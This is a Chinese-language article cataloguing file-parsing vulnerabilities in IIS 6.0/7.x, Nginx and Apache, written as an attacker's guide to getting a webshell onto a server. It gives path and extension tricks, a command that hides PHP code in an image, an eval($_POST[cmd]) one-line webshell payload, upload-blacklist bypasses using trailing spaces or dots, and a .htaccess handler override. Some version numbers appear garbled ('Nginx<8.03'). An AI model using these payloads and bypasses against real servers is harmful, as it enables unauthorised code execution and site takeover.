web服務器的解析漏洞羅列

前言

服務器相關中間件存在一些解析漏洞，攻擊者可經過上傳必定格式的文件，被服務器的中間件進行了解析，這樣就對系統形成必定危害。常見的服務器解析漏洞涉及的中間件有IIS，apache、nginx等。可利用解析漏洞來成功執行咱們的腳本馬。

檢查方法

一、IIS 6.0

目錄解析：/xx.asp/xx.jpg則以下：xx.jpg可替換爲任意文本文件(xx.txt)，文本內容爲後門代碼IIS6.0會將xx.jpg解析爲asp文件。

後綴解析：/xx.asp;.jpg則以下：/xx.asp:.jpg(此處需抓包修改文件名)IIS6.0都會把此類後綴文件成功解析爲asp文件。

默認解析：/xx.asa和/xx.cer和/xx.cdx IIS6.0默認的可執行文件除了asp還包含這三種，此處可關聯利用目錄解析漏洞/xx.asa/xx.jpg或/xx.cer/xx.jpg或xx.asa;.jpg

二、IIS 7.0/IIS 7.5/Nginx<8.03

IIS 7.0/IIS 7.5/Nginx<8.03在默認Fast-CGI開啓情況下，在一個文件路徑(/xx.jpg)後面加上/xx.php會將/xx.jpg/xx.php解析爲php文件。經常使用利用方法：將一張圖和一個寫入後門代碼的文本文件合併將惡意文本寫入圖片的二進制代碼以後，避免破壞圖片文件頭和尾:

copy xx.jpg/b + yy.txt/a xy.jpg ######################################/b即二進制[binary]模式/a即ascii模式xx.jpg正常圖片文件yy.txt內容<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>意思爲寫入一個內容爲<?php eval($_POST[cmd])?>名稱爲shell.php的文件######################################找個地方上傳xy.jpg，而後找到xy.jpg的地址，在地址後加上/xx.php便可執行惡意文本。而後就在圖片目錄下生成一句話木馬shell.php密碼cmd

三、Nginx<8.03

在Fast-CGI關閉的狀況下，Nginx<8.03依然存在解析漏洞在一個文件路徑(/xx.jpg)後面加上%00.php會將/xx.jpg%00.php解析爲php文件

四、Apache

後綴解析：test.php.x1.x2.x3 Apache將從右至左開始判斷後綴，若x3非可識別後綴，再判斷x2，直到找到可識別後綴爲止，而後將該可識別後綴進解析test.php.x1.x2.x3則會被解析爲php經驗之談：php|php3|phtml多可被Apache解析

五、其餘一些可利用的：

在windows環境下，xx.jpg[空格]或xx.jpg.這兩類文件都是不容許存在的，若這樣命名，windows會默認除去空格或點，這也是能夠被利用的！在向一臺windows主機上傳數據時，你能夠抓包修改文件名，在後面加個空格或點，試圖繞過黑名單，若上傳成功，最後的點或空格都會被消除，這樣就可獲得shell。我記得FckPhp2.6就存在加空格繞過的漏洞。{Linux主機中不行，Linux容許這類文件存在}若是在Apache中.htaccess可被執行(默認不執行，這是90sec裏的一位朋友說的，當初我並不知道)，且能夠被上傳，那能夠嘗試在.htaccess中寫入:<FilesMatch「shell.jpg」>SetHandler application/x-httpd-php </FilesMatch> shell.jpg換成你上傳的文件，這樣shell.jpg就可解析爲php文件。